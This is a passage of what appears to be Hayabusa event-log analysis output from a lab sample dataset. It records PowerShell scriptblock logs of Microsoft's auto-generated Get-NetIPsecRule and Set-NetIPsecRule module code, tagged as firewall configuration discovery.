[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description',",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 
$__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 
'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] 
${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
